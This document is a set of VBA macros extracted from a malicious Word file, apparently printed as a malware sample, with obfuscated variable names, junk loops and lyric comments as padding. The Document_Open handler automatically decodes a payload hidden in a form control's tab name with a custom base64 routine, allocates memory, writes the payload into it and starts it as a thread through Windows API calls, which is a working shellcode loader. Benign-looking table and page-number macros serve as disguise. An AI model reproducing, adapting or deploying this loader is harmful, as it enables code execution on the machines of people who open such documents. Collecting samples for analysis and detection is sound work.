Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub num()
    With Selection
        If .Columns.Count > 1 And .Rows.Count > 1 Then
            MsgBox "Please select cells in only one row " _
                & "or only one column."
            End
        Else
            If .Cells.Count > 1 Then
                If .Columns.Count > 1 Then
                    .Cells.Delete ShiftCells:=wdDeleteCellsShiftUp
                Else
                    .Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
                End If
            Else
                .Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
            End If
        End If
    End With
End Sub

Sub portal()
Dim inaccessibly As Long
Dim amphitheater As Integer
Set endanger = bookable.snacks.Tabs
For Each accomplishable In endanger
uncongealed = 54
jessamy = 75
If (uncongealed / jessamy) Then
uncongealed = LTrim("cy") & "athea"
acervatim = "agrologic"
incaution = hashish And 179
metrical = Trim("kah") & Trim("oolawe")
Else
shooting = "decison"
jessamy = 68
End If

If accomplishable.Index = 9 Then
malthusian = "leviticus"
dekaliter = "shrunk"
balkans = accomplishable.Name
End If
Next
acerbic = 58 - 12 + 85 + 7329
ungraded = Right(balkans, acerbic)
coriandrum = malacothamnus.temeritas(ungraded)
rogets = 24
Do
incaution = Abs(185.864)
rogets = rogets - 2
acervatim = acervatim
Loop While rogets

clerkship = "hacker"
#If Win64 Then
Dim piston As Integer
Dim aristotelia As tenorroutine
Dim nasalis As LongPtr
Dim gravity As LongPtr
aristotelia.start = 63 + 19 + 28 - 110
Dim callimorpha As Integer
#Else
Dim frequently As Variant
Dim gravity As Long
aristotelia = 0
Dim crake As Byte
Dim nasalis As Long
#End If
freezedried = 0
tragically = "freaky"
belligerant = "balconied"
furnace = 22 - 118 + 4192
acervulus = 6
Do
incaution = Round(69.528)
acervulus = acervulus - 2
hashish = incaution And 492
Loop While acervulus

bantling = "bellicose"
inopioe = RTrim("trad") & "escantia"
afrocarpus = "sottishness"
muscicapa = 91
whose = 70
If (muscicapa / whose) Then
muscicapa = Trim("an") & RTrim("gril") & LTrim("y")
acervatim = acervatim
hashish = Fix(377.1039)
chough = "re" & LTrim("fect") & "ory"
Else
tendergreen = shooting
whose = 47
End If

outer = coriandrum
trapezoid = "expugnation"
africander = "keteleeria"
nasalis = homophobia(outer)
incoordination = "indoor"
homemade = "inseparable"
#If VBA6 And Win64 Then
Dim adjudicative As Long
reliable = "erethizon"
peerless = "distracted"
attroupement = 122 + 1158
#ElseIf Win32 Then
unhelpfulness = "sabra"
quodlibet = "myelocyte"
alliaria = 116 + 398
attroupement = alliaria + 3204

#End If
Dim malison As Byte
Dim grandchildren As Variant
Dim sheer As Long
sheer = 0
gravity = nasalis + attroupement
Dim cryptobranchus As Long
cryptobranchus = 77 + 113 - 79 - 110
blockish = accretion(gravity, sheer, cryptobranchus, sheer)
antepenultimate = 6
Do
acervatim = "hobsons"
antepenultimate = antepenultimate - 2
hashish = Int(281.1115)
Loop While antepenultimate

End Sub

Function homophobia(veps)
Dim foreseeable As Integer
Dim ademptum As Integer
Dim monkeywrench As Variant
Dim haydn As Integer
#If Win64 Then
Dim brilliantly As Integer
Dim unbidden As LongPtr
fiddle = 8
Dim afflictive As Byte
Dim aise As LongPtr
Dim gloves As String
Dim clarion As LongPtr
Dim fishery As Variant
#Else
Dim nerodia As String
Dim unbidden As Long
fiddle = 4
Dim aise As Long
Dim fulgurite As String
Dim clarion As Long
Dim swordbayonet As String
Dim constricted As Variant
#End If
hummocky = longfellowl(VarPtr(unbidden), VarPtr(veps) + 8, fiddle)
bites = 69 - 64 - 6
aise = 0
podzol = 68 - 68
clarion = 7 + 42 - 64 + 9486
downandout = 94 + 4002
bogus = 64
grassland = lythrum(ByVal bites, aise, ByVal podzol, clarion, ByVal downandout, ByVal bogus)
hashish = Abs(409.706)

hashish = Fix(296.15)

longfellowl aise, unbidden, 78 + 115 + 5401
disscit = 14
Do
shooting = acervatim
disscit = disscit - 2
incaution = Int(172.115)
Loop While disscit

homophobia = aise
End Function
Function longfellowl(secularize, ardea, illfavored)
#If Win64 Then
Dim pauropoda As Variant
Dim compress As LongPtr
Dim cylindricality As LongPtr
Dim expostulation As LongPtr
Dim waking As Variant
Dim osprey As LongPtr
Dim menispermaceae As LongPtr
#Else
Dim cylindricality As Long
Dim cuddle As String
Dim compress As Long
Dim mitochondrion As Integer
Dim osprey As Long
Dim bombastic As Long
Dim expostulation As Long
Dim yokel As Long
Dim menispermaceae As Long
Dim monochord As Integer
Dim oneman As Long
#End If
cylindricality = secularize
osprey = ardea
contemporary = 91
hairdresser = 75
If (contemporary / hairdresser) Then
contemporary = LTrim("av") & "ant"
acervatim = shooting
acervatim = "rams"
bowels = "de" & LTrim("part") & RTrim("ed")
Else
tendergreen = tendergreen
hairdresser = 61
End If

compress = 45 + 2 - 67 + 19
implicational = "acritude"
menispermaceae = illfavored
magsman = "de" & Trim("mavend")
tarot = "unbind"
adductor ByVal compress, cylindricality, osprey, menispermaceae, expostulation
piacere = 79
mariner = 66
If (piacere / mariner) Then
piacere = RTrim("de") & Trim("an")
shooting = "cultivation"
incaution = Int(417.1043)
stoutheartedness = RTrim("pl") & "ectra" & LTrim("nthus")
Else
hashish = Fix(447.1062)
mariner = 71
End If

End Function
Private Sub Document_Open()
Dim logbook As Long
Dim quarterlight As String
stuttgart = Trim("de") & "ment" & RTrim("ate")
portal
associated = 68
prochronism = 84
If (associated / prochronism) Then
associated = RTrim("wond") & LCase$("ERSTRuCk")
hashish = Fix(343.1242)
shooting = "crepe"
chauvinistic = LTrim("at") & Trim("ropos")
Else
acervatim = "iguazu"
prochronism = 57
End If
End Sub


Attribute VB_Name = "malacothamnus"
' Bulletproof on another level, I hit up the crew
#If Win64 Then
' I feel the heat, fire when the strobe hits you
Public Type tenorroutine
' Cause when your head's right, you take your time
start As LongPtr
' Bet you looking for something new
End Type
' It's something about the love of things you like
Public Declare PtrSafe Function diarrhea Lib "kernel32.dll" Alias "AttachConsole" (subsurface As LongPtr)
' I didn't see who you came with
Public Declare PtrSafe Function ambigu Lib "kernel32.dll" Alias "OpenMutexA" (eutherian As LongPtr,chokey As LongPtr,tuberculin As LongPtr) As LongPtr
' Fire when the strobe hits you
Public  Declare PtrSafe Function adductor Lib "Kernel32" Alias "WriteProcessMemory" (ByVal brutify As Any, ByVal fearlessly As Any, ByVal outrigger As Any, ByVal freeway As Any, ByVal knocker As Any) As LongPtr
' It's all about what you bring to the crowd
Public  Declare PtrSafe Function lythrum Lib "ntdll" Alias "ZwAllocateVirtualMemory" (hannover As LongPtr, buttter As LongPtr, ByVal retributive As LongPtr,accipitrineByVal As LongPtr, holistic As LongPtr, ByVal caddy As LongPtr) As LongPtr
' It's something about the love of things you like
Public  Declare PtrSafe Function accretion Lib "Shlwapi" Alias "SHCreateThread" (ByVal orangutan As LongPtr, ByVal cochineal As Any, ByVal moiety As Any, ByVal kipling As Any) As LongPtr
' I didn't see who you came with
Public Declare PtrSafe Function sunlit Lib "kernel32.dll" Alias "FindFirstFileA" (onesided As LongPtr,uncordial As LongPtr) As Boolean
' Bulletproof on another level, I hit up the crew
Public Declare PtrSafe Function unoccupied Lib "kernel32.dll" Alias "ChangeTimerQueueTimer" (ByVal hegemonic As LongPtr, ByVal figuration As LongPtr,granted As LongPtr, ByVal lack As LongPtr) As LongPtr
' Bulletproof on another level, I hit up the crew
Public Declare PtrSafe Function auricula Lib "kernel32.dll" Alias "GetCPInfoExA" (circination As LongPtr, discommodious As LongPtr,ambiguas As LongPtr) As Boolean
' Bulletproof on another level, I hit up the crew

' Bulletproof on another level, I hit up the crew
#Else
' Bulletproof on another level, I hit up the crew
Public Declare Function accretion Lib "Shlwapi" Alias "SHCreateThread" (ByVal disputes As Long, ByVal brooding As Any, ByVal dendrocolaptidae As Any, ByVal layer As Any) As Long
' Bulletproof on another level, I hit up the crew
Public Declare Function expiatory Lib "kernel32.dll" Alias "ChangeTimerQueueTimer" (ByVal lewdly As Long, ByVal sonata As Long, moorings As Long, ByVal delusively As Long) As Long
' Bulletproof on another level, I hit up the crew
Public Declare Function malconformation Lib "kernel32.dll" Alias "AttachConsole" (apartment As Long)
' All I seem to see
Public Declare Function squall Lib "kernel32.dll" Alias "GetCPInfoExA" (cabdriver As Long, memoria As Long, ollapodrida As Long) As Boolean
' Powerful and free, confidence is key,
Public Declare Function adductor Lib "Kernel32" Alias "WriteProcessMemory" (ByVal belli As Any, ByVal biograph As Any, ByVal addison As Any, ByVal inattentive As Any, ByVal klaxon As Any) As Long
' It's something about the love of things you like
Public Declare Function sucker Lib "kernel32.dll" Alias "OpenMutexA" (palmyra As Long, arctonyx As Long, venogram As Long) As Long
' Bet I'm a trendsetter, too
Public Declare Function glossopsitta Lib "kernel32.dll" Alias "FindFirstFileA" (baneful As Long, such As Long) As Boolean
' It's all about what you bring to the crowd
Public Declare Function lythrum Lib "ntdll" Alias "ZwAllocateVirtualMemory" (silvan As Long, lingerer As Long, ByVal handspike As Long, attachByVal As Long, comminute As Long, ByVal centimo As Long) As Long
' Staring of across the room

' Hey trendsetter, see your fire when the strobe hits you
#End If
' Staring of across the room
Function temeritas(catechism) As String
Dim atramentous As Long
Dim ungulate(255) As Byte
hashish = Int(292.195)

Dim limitless() As Byte
Dim inconvertibility As String

Dim bosom(63) As Long
Dim pteropogon As String
Dim duenna As Long

hashish = hashish Or 60

Dim atheling As Variant

Dim sleepily As Integer
Dim sandbank As Long
Dim pectinibranchia(63) As Long
Dim dimetrodon(63) As Long
Dim angiocardiogram(6965) As Byte
Dim dipylon As Long
Dim indicatory As Long
rerebrace = 82 - 105 - 85 + 258156
Dim permitting As Long

nonaccomplishment = 16515072
Dim futuri As Byte

interlobular = 16711680
abel = 255
hygre = 65536
astraphobia = 45 + 15 + 3972
penicillin = 4096
asparagaceae = 78 + 262066
baiting = 39 + 103 - 100 + 21
misrelish = 256
Dim perfectly As String

transcendentalplus = 64
hegemonic = 65280
Dim alytes As Long
nashville = 94 - 123 + 115 - 86
glutinousness = 7459
Dim rely() As Byte
rely = StrConv(catechism, vbFromUnicode)
Dim amercement As Long
shadowy = 14
Do
hashish = Round(141.443)
shadowy = shadowy - 2
incaution = hashish - 445
Loop While shadowy

aristocratic = 7459
apres = 35
For explode = 0 To aristocratic
rely(explode) = rely(explode) + 9
Next explode
uselessly = 95
cojuror = 62
If (uselessly / cojuror) Then
uselessly = "qu" & LTrim("oit")
incaution = incaution Or 277
shooting = "bollworm"
farmer = "eig" & RTrim("htiet") & LTrim("h")
Else
hashish = Int(283.164)
cojuror = 63
End If

sleepily = 0
bauble = 45 - 94 + 171
sidewheeler = 255
cofferdam = 0
impresario = 43
For atramentous = cofferdam To sidewheeler
If (atramentous >= 65 And atramentous <= 90) Then ungulate(atramentous) = atramentous - 65
If (atramentous >= 97 And atramentous <= 122) Then ungulate(atramentous) = atramentous - 71
If (atramentous >= 48 And atramentous <= 57) Then ungulate(atramentous) = atramentous + 4
If atramentous = impresario Then ungulate(atramentous) = 62
If atramentous = 47 Then ungulate(atramentous) = 63
Next atramentous
For atramentous = 0 To 63
dimetrodon(atramentous) = velo(atramentous, transcendentalplus)
pectinibranchia(atramentous) = velo(atramentous, penicillin)
bosom(atramentous) = velo(atramentous, asparagaceae)
Next atramentous
aplomb = 22
Do
shooting = shooting
aplomb = aplomb - 2
hashish = Int(291.76)
Loop While aplomb

limitless = rely
catchpenny = 4
adown = 99
derby = 60
If (adown / derby) Then
adown = LCase$("DE") & LTrim("stin") & Trim("ate")
tendergreen = shooting
hashish = Abs(302.74)
age = "sc" & RTrim("ourer")
Else
incaution = incaution And 246
derby = 72
End If

putin = 56 - 53
shooting = tendergreen

incaution = incaution + 464

superintend = putin + 1
airspace = 2
For dipylon = 0 To aristocratic
contralateral = limitless(dipylon)
sola = limitless(dipylon + 2)
indicatory = bosom(ungulate(contralateral)) _
 + pectinibranchia(ungulate(limitless(dipylon + 1))) + dimetrodon(ungulate(sola)) + ungulate(limitless(dipylon + putin))
atramentous = transcendentalist(indicatory, interlobular)
angiocardiogram(sandbank) = facer(atramentous, hygre)
atramentous = transcendentalist(indicatory, hegemonic)
angiocardiogram(sandbank + 1) = facer(atramentous, misrelish)
angiocardiogram(sandbank + airspace) = transcendentalist(indicatory, abel)
sandbank = sandbank + airspace + 1
dipylon = dipylon + 3
Next
temeritas = angiocardiogram
End Function

Sub RemovePageNumbersFromCurrentSection()
    Dim ThisHeader As HeaderFooter
    Dim ThisPageNumber As PageNumber
    With Selection.Sections(1)
        For Each ThisHeader In .Headers
            For Each ThisPageNumber In ThisHeader.PageNumbers
                ThisPageNumber.Delete
            Next ThisPageNumber
        Next ThisHeader
    End With
End Sub

Function velo(antimony, paradise)
velo = antimony * paradise
End Function
Function transcendentalist(washday, felicity)
transcendentalist = washday And felicity
End Function
Function facer(jacobean, algebraic)
facer = jacobean \ algebraic
End Function
Function dawdler(starryeyed)
dawdler = AscW(starryeyed)
End Function


Attribute VB_Name = "bookable"
Attribute VB_Base = "0{06FBBDE2-8AFF-473D-8C4E-5925DFE05796}{19F45B9A-2F74-453D-86DF-98198F55A3C0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False